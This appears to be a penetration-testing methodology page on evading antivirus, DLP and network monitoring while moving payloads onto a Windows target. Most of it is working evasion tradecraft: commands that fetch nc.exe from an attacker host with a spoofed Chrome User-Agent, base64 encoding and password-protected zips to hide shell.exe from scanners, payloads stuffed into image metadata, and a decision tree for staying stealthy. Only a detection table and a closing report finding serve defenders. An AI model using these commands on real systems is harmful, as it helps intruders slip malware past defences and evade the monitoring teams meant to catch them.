π‘οΈ Methodology Checklist
- Identify AV/EDR presence on target
- Rename binaries to benign names before transfer
- Encode payload: base64 encode on attacker, decode on target
- Split file into chunks if size limits apply
- Use alternate data streams (ADS) on NTFS to hide files
- Transfer via DNS (dnscat2) or ICMP if HTTP/SMB blocked
- Verify AV does not flag transferred file before execution
π― Operational Context
Use when: AV or DLP is scanning transfers and detecting payloads β encode, split, rename, or compress to bypass content inspection.
Think Dumber First: Base64 encoding changes every byte signature while adding zero functionality overhead. base64 shell.exe | tr -d '\n' > shell.b64 β transfer text β base64 -d shell.b64 > shell.exe. Works against most static content inspection.
Skip when: Target has behavioral EDR β encoding only bypasses static/signature inspection, not behavioral.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
Invoke-WebRequest http://[TARGET_IP]/nc.exe -OutFile nc.exe | Default IWR β leaves PowerShell UA in logs |
[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="UA";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl | List built-in PowerShell UA strings |
$UA=[Microsoft.PowerShell.Commands.PSUserAgent]::Chrome; Invoke-WebRequest http://[TARGET_IP]/nc.exe -UserAgent $UA -OutFile nc.exe | Download while impersonating Chrome |
Invoke-WebRequest http://[TARGET_IP]/nc.exe -UserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/91.0.4472.124 Safari/537.36" -OutFile nc.exe | Hardcoded Chrome UA string |
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/91.0.4472.124 Safari/537.36" http://[TARGET_IP]/nc.exe -o nc.exe | cURL download with Chrome UA |
GfxDownloadWrapper.exe "http://[TARGET_IP]/file.exe" "C:\Temp\file.exe" | Intel GPU driver binary β minimal logging |
π¬ Deep Dive & Workflow
How Blue Teams Detect File Transfers
Network-based detection is more robust than command-line logging (easily bypassed with obfuscation). SIEMs and NDR tools inspect HTTP User-Agent headers β many LOL binaries have hardcoded, distinctive UAs.
Known User-Agent Signatures (What Blue Teams See)
| Tool | User-Agent String | Detection Risk |
|---|---|---|
PowerShell Invoke-WebRequest | Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0 | High β trivially identified |
| WinHttp COM object | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Medium |
| Msxml2 XMLHTTP COM | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0) | Medium β IE7 traffic is suspicious in modern environments |
certutil.exe | Microsoft-CryptoAPI/10.0 | Critical β actively hunted |
| BITS | Microsoft BITS/7.8 | Medium β rare for user-initiated transfers |
curl default | curl/7.x.x | High β non-human UA |
Spoofing the User-Agent (PowerShell)
# Option 1: Use built-in PSUserAgent class
$UA = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Invoke-WebRequest http://[ATTACKER_IP]/nc.exe -UserAgent $UA -OutFile nc.exe
# Option 2: Hardcode a real browser string
$UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
Invoke-WebRequest http://[ATTACKER_IP]/nc.exe -UserAgent $UA -OutFile nc.exeBlue Team impact: SIEM filters often exclude βstandardβ browser UAs to reduce noise. Your download blends in with normal web browsing.
Spoofing the User-Agent (cURL)
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/91.0.4472.124 Safari/537.36" http://[ATTACKER_IP]/nc.exe -o nc.exeEvasion Decision Tree
- Transfer fails immediately? β Check if UA is being filtered; try spoofing
- certutil flagged? β Canβt change its UA; switch to BITSAdmin or Extrac32
- BITS transfer? β Rare for users to initiate to external IPs; only use if stealth needed and target is monitoring UA carefully
- Maximum stealth required? β Use
GfxDownloadWrapper(Intel driver binary) or WinRM PSSession (no HTTP at all)
LOLBAS Binaries That Cannot Spoof UA
certutil, BITSAdmin, and BITS have hardcoded User-Agent strings and cannot be changed. Avoid these in high-security environments. Prefer Invoke-WebRequest with a spoofed UA or WinRM-based transfers.
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Base64 transfer gets flagged | Pattern detection not content | Try: encrypt with openssl enc, then transfer; or split into multiple small files |
| Renamed payload detected | Hash-based detection | Patch a few bytes in the payload; recompile if source available; use custom encoder |
| Compressed archive detected | AV scans inside archives | Password-protect zip: zip -e -P password shell.zip shell.exe β AV canβt scan encrypted archives |
| Chunked file transfer reassembly fails | Part files corrupt | Verify: md5sum part_* on both sides; use cat part_* > reassembled not copy |
| Steganography tool not available on target | No steg tooling | Use data in image metadata: exiftool -Comment='[BASE64_PAYLOAD]' image.jpg; extract on target |
π Reporting Trigger
Finding Title: Payload Encoding and Obfuscation Bypasses Content Inspection Impact: Encoded or compressed payloads evade AV signature detection and DLP content inspection during file transfer, allowing malicious content to reach target systems undetected. Root Cause: Security controls rely on static content signatures rather than behavioral analysis. Encoded payloads have no matching signatures. Recommendation: Implement behavioral EDR that detects post-decode execution regardless of transfer encoding. Deploy sandbox detonation for unknown files. Apply file reputation checks at the perimeter.